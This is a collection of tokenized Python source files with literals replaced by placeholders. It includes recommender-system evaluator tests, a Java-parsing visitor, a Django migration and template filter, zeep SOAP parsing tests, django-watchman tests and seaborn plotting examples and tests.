<NUM_LIT:1.0> ) <EOL> mae = evaluator . evaluate ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( mae [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and mae [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> nmae = evaluator . evaluate ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( nmae [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and nmae [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> precision = evaluator . evaluate ( boolean_recsys , '<STR_LIT>' , <EOL> permutation = False ) <EOL> assert_true ( precision [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and precision [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> recall = evaluator . evaluate ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( recall [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and recall [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> f1score = evaluator . evaluate ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( f1score [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and f1score [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> all_scores = evaluator . evaluate ( recsys , permutation = False ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> nmae = evaluator . evaluate ( boolean_recsys , '<STR_LIT>' , permutation = False , <EOL> sampling_users = <NUM_LIT> , sampling_ratings = <NUM_LIT> ) <EOL> assert_true ( nmae [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and nmae [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> def test_root_CfEvaluator_evaluate_on_split ( ) : <EOL> """<STR_LIT>""" <EOL> evaluator = CfEvaluator ( ) <EOL> assert_raises ( ValueError , evaluator . evaluate_on_split , recsys , '<STR_LIT>' ) <EOL> rmse = evaluator . evaluate_on_split ( recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in rmse [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( rmse [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> rmse [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> mae = evaluator . evaluate_on_split ( recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in mae [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( mae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> mae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> nmae = evaluator . evaluate_on_split ( recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in nmae [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( nmae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> nmae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> precision = evaluator . evaluate_on_split ( recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in precision [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( precision [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> precision [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> recall = evaluator . evaluate_on_split ( recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in recall [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( recall [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> recall [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> f1score = evaluator . evaluate_on_split ( recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in f1score [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( f1score [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> f1score [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> all_scores = evaluator . evaluate_on_split ( recsys , permutation = False ) <EOL> for p in all_scores [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> for p in all_scores [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_raises ( ValueError , evaluator . evaluate_on_split , boolean_recsys , '<STR_LIT>' ) <EOL> rmse = evaluator . evaluate_on_split ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in rmse [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( rmse [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> rmse [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> mae = evaluator . evaluate_on_split ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in mae [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( mae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> mae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> nmae = evaluator . evaluate_on_split ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in nmae [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( nmae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> nmae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> precision = evaluator . evaluate_on_split ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in precision [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( precision [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> precision [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> recall = evaluator . evaluate_on_split ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in recall [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( recall [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> recall [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> f1score = evaluator . evaluate_on_split ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in f1score [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( f1score [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> f1score [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> all_scores = evaluator . evaluate_on_split ( boolean_recsys , permutation = False ) <EOL> for p in all_scores [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> for p in all_scores [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) </s>
<s> """<STR_LIT>""" <EOL> import math <EOL> try : <EOL> import itertools <EOL> combinations = itertools . combinations <EOL> except AttributeError : <EOL> def combinations ( seq , r = None ) : <EOL> """<STR_LIT>""" <EOL> if r == None : <EOL> r = len ( seq ) <EOL> if r <= <NUM_LIT:0> : <EOL> yield [ ] <EOL> else : <EOL> for i in xrange ( len ( seq ) ) : <EOL> for cc in combinations ( seq [ i + <NUM_LIT:1> : ] , r - <NUM_LIT:1> ) : <EOL> yield [ seq [ i ] ] + cc <EOL> try : <EOL> factorial = math . factorial <EOL> except AttributeError : <EOL> def factorial ( x ) : <EOL> n = abs ( int ( x ) ) <EOL> if n < <NUM_LIT:1> : <EOL> n = <NUM_LIT:1> <EOL> x = <NUM_LIT:1> <EOL> for i in range ( <NUM_LIT:1> , n + <NUM_LIT:1> ) : <EOL> x = i * x <EOL> return x </s>
<s> import sys <EOL> import plyj . parser <EOL> import plyj . model as m <EOL> p = plyj . parser . Parser ( ) <EOL> tree = p . parse_file ( sys . argv [ <NUM_LIT:1> ] ) <EOL> class MyVisitor ( m . Visitor ) : <EOL> def __init__ ( self ) : <EOL> super ( MyVisitor , self ) . __init__ ( ) <EOL> self . first_field = True <EOL> self . first_method = True <EOL> def visit_ClassDeclaration ( self , class_decl ) : <EOL> return self . visit_type_declaration ( class_decl ) <EOL> def visit_InterfaceDeclaration ( self , interface_decl ) : <EOL> return self . visit_type_declaration ( interface_decl ) <EOL> def visit_type_declaration ( self , type_decl ) : <EOL> print ( str ( type_decl . name ) ) <EOL> if type_decl . extends is not None : <EOL> print ( '<STR_LIT>' + type_decl . extends . name . value ) <EOL> if len ( type_decl . implements ) is not <NUM_LIT:0> : <EOL> print ( '<STR_LIT>' + '<STR_LIT:U+002CU+0020>' . join ( [ type . name . value for type in type_decl . implements ] ) ) <EOL> print <EOL> return True <EOL> def visit_FieldDeclaration ( self , field_decl ) : <EOL> if self . first_field : <EOL> print ( '<STR_LIT>' ) <EOL> self . first_field = False <EOL> for var_decl in field_decl . variable_declarators : <EOL> if type ( field_decl . type ) is str : <EOL> type_name = field_decl . type <EOL> else : <EOL> type_name = field_decl . type . name . value <EOL> print ( '<STR_LIT:U+0020>' + type_name + '<STR_LIT:U+0020>' + var_decl . variable . name ) <EOL> def visit_MethodDeclaration ( self , method_decl ) : <EOL> if self . first_method : <EOL> print <EOL> print ( '<STR_LIT>' ) <EOL> self . first_method = False <EOL> param_strings = [ ] <EOL> for param in method_decl . parameters : <EOL> if type ( param . type ) is str : <EOL> param_strings . append ( param . type + '<STR_LIT:U+0020>' + param . variable . name ) <EOL> else : <EOL> param_strings . append ( param . type . name . value + '<STR_LIT:U+0020>' + param . variable . name ) <EOL> print ( '<STR_LIT:U+0020>' + method_decl . name + '<STR_LIT:(>' + '<STR_LIT:U+002CU+0020>' . join ( param_strings ) + '<STR_LIT:)>' ) <EOL> return True <EOL> def visit_VariableDeclaration ( self , var_declaration ) : <EOL> for var_decl in var_declaration . variable_declarators : <EOL> if type ( var_declaration . type ) is str : <EOL> type_name = var_declaration . type <EOL> else : <EOL> type_name = var_declaration . type . name . value <EOL> print ( '<STR_LIT:U+0020>' + type_name + '<STR_LIT:U+0020>' + var_decl . variable . name ) <EOL> print ( '<STR_LIT>' ) <EOL> tree . accept ( MyVisitor ( ) ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import django . utils . timezone <EOL> import model_utils . fields <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:200> , unique = True ) ) , <EOL> ( '<STR_LIT:description>' , models . CharField ( default = '<STR_LIT>' , max_length = <NUM_LIT> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . ManyToManyField ( related_name = '<STR_LIT>' , to = '<STR_LIT>' , blank = True ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> ] </s>
<s> from django import template <EOL> register = template . Library ( ) <EOL> @ register . filter <EOL> def is_owner_of ( user , repository ) : <EOL> return repository . check_user_role ( user , [ '<STR_LIT>' ] ) </s>
<s> from zeep . client import Client </s>
<s> from lxml import etree <EOL> from zeep . xsd import Schema <EOL> def test_parse_response ( ) : <EOL> schema_node = etree . fromstring ( b"""<STR_LIT>""" . strip ( ) ) <EOL> response_node = etree . fromstring ( b"""<STR_LIT>""" . strip ( ) ) <EOL> schema = Schema ( schema_node . find ( '<STR_LIT>' ) ) <EOL> assert schema <EOL> response_type = schema . get_element ( <EOL> '<STR_LIT>' ) <EOL> nsmap = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> node = response_node . find ( '<STR_LIT>' , namespaces = nsmap ) <EOL> assert node is not None <EOL> obj = response_type . parse ( node ) <EOL> assert obj . ZeepExampleResult . SomeValue == <NUM_LIT> <EOL> assert len ( obj . ZeepExampleResult . Results . Item ) == <NUM_LIT:2> <EOL> assert obj . ZeepExampleResult . Results . Item [ <NUM_LIT:0> ] . Key == '<STR_LIT>' <EOL> assert obj . ZeepExampleResult . Results . Item [ <NUM_LIT:0> ] . Value == <NUM_LIT:10> <EOL> assert obj . ZeepExampleResult . Results . Item [ <NUM_LIT:1> ] . Key == '<STR_LIT>' <EOL> assert obj . ZeepExampleResult . Results . Item [ <NUM_LIT:1> ] . Value == <NUM_LIT:20> </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import unittest <EOL> from mock import patch <EOL> from watchman . utils import get_cache , get_checks <EOL> class TestWatchman ( unittest . TestCase ) : <EOL> def assertListsEqual ( self , list1 , list2 ) : <EOL> try : <EOL> self . assertCountEqual ( list1 , list2 ) <EOL> except AttributeError : <EOL> self . assertItemsEqual ( list1 , list2 ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_cache ( self , cache_mock ) : <EOL> cache_key = '<STR_LIT>' <EOL> cache_value = '<STR_LIT>' <EOL> cache = { cache_key : cache_value } <EOL> def getitem ( cache_name ) : <EOL> return cache [ cache_name ] <EOL> cache_mock . caches . __getitem__ . side_effect = getitem <EOL> result = get_cache ( cache_key ) <EOL> self . assertEqual ( result , cache_value ) <EOL> @ unittest . skip ( "<STR_LIT>" ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_cache_less_than_django_17 ( self , django_mock , get_cache_mock ) : <EOL> django_mock . VERSION = ( <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:6> , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> get_cache ( '<STR_LIT:foo>' ) <EOL> get_cache_mock . assert_called_once_with ( '<STR_LIT:foo>' ) <EOL> def test_get_checks_returns_all_available_checks_by_default ( self ) : <EOL> checks = [ check . __name__ for check in get_checks ( ) ] <EOL> expected_checks = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . assertListsEqual ( checks , expected_checks ) <EOL> def test_get_checks_with_check_list_returns_union ( self ) : <EOL> check_list = [ '<STR_LIT>' ] <EOL> checks = [ check . __name__ for check in get_checks ( check_list = check_list ) ] <EOL> expected_checks = [ '<STR_LIT>' ] <EOL> self . assertListsEqual ( checks , expected_checks ) <EOL> def test_get_checks_with_skip_list_returns_difference ( self ) : <EOL> skip_list = [ '<STR_LIT>' ] <EOL> checks = [ check . __name__ for check in get_checks ( skip_list = skip_list ) ] <EOL> expected_checks = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . assertListsEqual ( checks , expected_checks ) <EOL> def test_get_checks_with_matching_check_and_skip_list_returns_empty_list ( self ) : <EOL> check_list , skip_list = [ '<STR_LIT>' ] , [ '<STR_LIT>' ] <EOL> checks = [ check . __name__ for check in get_checks ( check_list = check_list , skip_list = skip_list ) ] <EOL> expected_checks = [ ] <EOL> self . assertListsEqual ( checks , expected_checks ) <EOL> def test_get_checks_with_check_and_skip_list ( self ) : <EOL> check_list = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> skip_list = [ '<STR_LIT>' ] <EOL> checks = [ check . __name__ for check in get_checks ( check_list = check_list , skip_list = skip_list ) ] <EOL> expected_checks = [ '<STR_LIT>' ] <EOL> self . assertListsEqual ( checks , expected_checks ) <EOL> def test_get_checks_with_paid_checks_disabled_returns_expected_checks ( self ) : <EOL> expected_checks = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> checks = [ check . __name__ for check in get_checks ( ) ] <EOL> self . assertListsEqual ( checks , expected_checks ) <EOL> @ unittest . skip ( "<STR_LIT>" ) <EOL> def test_get_checks_with_paid_checks_enabled_returns_expected_checks ( self ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import seaborn as sns <EOL> sns . set ( style = "<STR_LIT>" ) <EOL> df = sns . load_dataset ( "<STR_LIT>" ) <EOL> sns . lmplot ( x = "<STR_LIT:x>" , y = "<STR_LIT:y>" , col = "<STR_LIT>" , hue = "<STR_LIT>" , data = df , <EOL> col_wrap = <NUM_LIT:2> , ci = None , palette = "<STR_LIT>" , size = <NUM_LIT:4> , <EOL> scatter_kws = { "<STR_LIT:s>" : <NUM_LIT:50> , "<STR_LIT>" : <NUM_LIT:1> } ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import seaborn as sns <EOL> sns . set ( style = "<STR_LIT>" ) <EOL> rs = np . random . RandomState ( <NUM_LIT:7> ) <EOL> x = rs . normal ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT> ) <EOL> y = <NUM_LIT:2> + <NUM_LIT> * x + rs . normal ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ) <EOL> sns . residplot ( x , y , lowess = True , color = "<STR_LIT:g>" ) </s>
<s> import nose . tools as nt <EOL> import numpy . testing as npt <EOL> import matplotlib . pyplot as plt <EOL> from . import PlotTestCase <EOL> from . . import miscplot as misc <EOL> from seaborn import color_palette <EOL> class TestPalPlot ( PlotTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_palplot_size ( self ) : <EOL> pal4 = color_palette ( "<STR_LIT>" , <NUM_LIT:4> ) <EOL> misc . palplot ( pal4 ) <EOL> size4 = plt . gcf ( ) . get_size_inches ( ) <EOL> nt . assert_equal ( tuple ( size4 ) , ( <NUM_LIT:4> , <NUM_LIT:1> ) ) <EOL> pal5 = color_palette ( "<STR_LIT>" , <NUM_LIT:5> ) <EOL> misc . palplot ( pal5 ) <EOL> size5 = plt . gcf ( ) . get_size_inches ( ) <EOL> nt . assert_equal ( tuple ( size5 ) , ( <NUM_LIT:5> , <NUM_LIT:1> ) ) <EOL> palbig = color_palette ( "<STR_LIT>" , <NUM_LIT:3> ) <EOL> misc . palplot ( palbig , <NUM_LIT:2> ) <EOL> sizebig = plt . gcf ( ) . get_size_inches ( ) <EOL> nt . assert_equal ( tuple ( sizebig ) , ( <NUM_LIT:6> , <NUM_LIT:2> ) ) </s>
